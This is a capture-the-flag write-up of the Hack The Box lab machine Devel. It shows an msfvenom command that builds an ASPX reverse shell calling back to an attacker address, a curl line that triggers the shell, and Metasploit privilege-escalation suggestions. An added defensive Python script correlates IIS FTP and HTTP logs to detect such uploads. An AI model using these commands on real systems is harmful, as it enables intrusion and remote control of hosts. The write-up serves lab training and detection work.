10.10.10.5 - Devel - Windows 7
ASPX reverse shell and Metasploit Enumeration
Summary:
Vulnerable software: MS IIS/7.5, FTP webroot exposed and writable
System vulnerable: 10.10.10.5
Vulnerability explanation: privilege escalation: kernel pool overflow in Win32k
Severity: critical
Enumeration:
Nmap shows that a Microsoft FTP server exposes the contents of the web server's wwwroot folder. This is dangerous if the server allows both read and write access to that folder, and in this case it does:
FileZilla showing the uploaded shell.aspx crafted by an attacker.
Instructions for creating a shell:
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.16 lport=4443 -f aspx > shell.aspx
Once we trigger the uploaded shell we get a connection back from the server:
curl -k http://10.10.10.5/shell.aspx
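From the defender's side, the FTP upload and the HTTP request that triggers it both leave log entries. The following is an added example, not part of the original write-up: it correlates IIS FTP and HTTP logs in W3C extended format to flag script files stored over FTP and then served by the web site. The log lines are constructed, and it assumes the FTP root and the web root are the same folder, as on this box.

```python
from datetime import datetime, timedelta

EXEC_EXT = (".aspx", ".asp", ".ashx", ".asmx")  # extensions IIS hands to a script engine

# Constructed sample logs (W3C extended format; addresses reuse the write-up's lab IPs).
FTP_LOG = """#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status
2019-02-18 20:41:02 10.10.14.16 anonymous 10.10.10.5 21 STOR /shell.aspx 226
2019-02-18 20:41:30 10.10.14.16 anonymous 10.10.10.5 21 STOR /notes.txt 226
2019-02-18 20:42:00 10.10.14.16 anonymous 10.10.10.5 21 STOR /denied.aspx 550
"""
HTTP_LOG = """#Fields: date time s-ip cs-method cs-uri-stem s-port c-ip sc-status
2019-02-18 20:40:00 10.10.10.5 GET /welcome.png 80 10.10.14.16 200
2019-02-18 20:43:10 10.10.10.5 GET /shell.aspx 80 10.10.14.16 200
2019-02-18 20:44:00 10.10.10.5 GET /notes.txt 80 10.10.14.16 200
"""

def parse_w3c(text):
    """Yield one dict per record, using the #Fields directive as the column names."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            rec = dict(zip(fields, line.split()))
            rec["ts"] = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
            yield rec

def uploads_then_executed(ftp_text, http_text, window=timedelta(hours=24)):
    """Return (path, uploader_ip, requester_ip) for script files written over FTP
    and then served by the web site within `window`."""
    stored = {}
    for r in parse_w3c(ftp_text):
        path = r["cs-uri-stem"].lower()
        # 226 = transfer complete; only successful writes of executable content matter
        if r["cs-method"].upper() == "STOR" and r["sc-status"] == "226" and path.endswith(EXEC_EXT):
            stored[path] = r
    findings = []
    for r in parse_w3c(http_text):
        up = stored.get(r["cs-uri-stem"].lower())
        if up and r["sc-status"] == "200" and timedelta(0) <= r["ts"] - up["ts"] <= window:
            findings.append((r["cs-uri-stem"], up["c-ip"], r["c-ip"]))
    return findings

if __name__ == "__main__":
    for f in uploads_then_executed(FTP_LOG, HTTP_LOG):
        print("ALERT script uploaded via FTP and requested over HTTP:", f)
```

A hit here also points at the underlying misconfiguration: the FTP site should not grant write access to a folder that IIS executes scripts from.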
Next we run local_exploit_suggester to find possible kernel privilege escalation methods on this Windows 7 Box.
meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows
Metasploit's exploit_suggester came up with a few exploits matching the architecture of the victim:
Metasploit local enumeration
Because the system was left unpatched, many of the above suggestions executed successfully on the target, giving a potential attacker an NT_AUTHORITY level account:
MS16-075 - Also known as Juicy Potato
MS13-053
MS14-058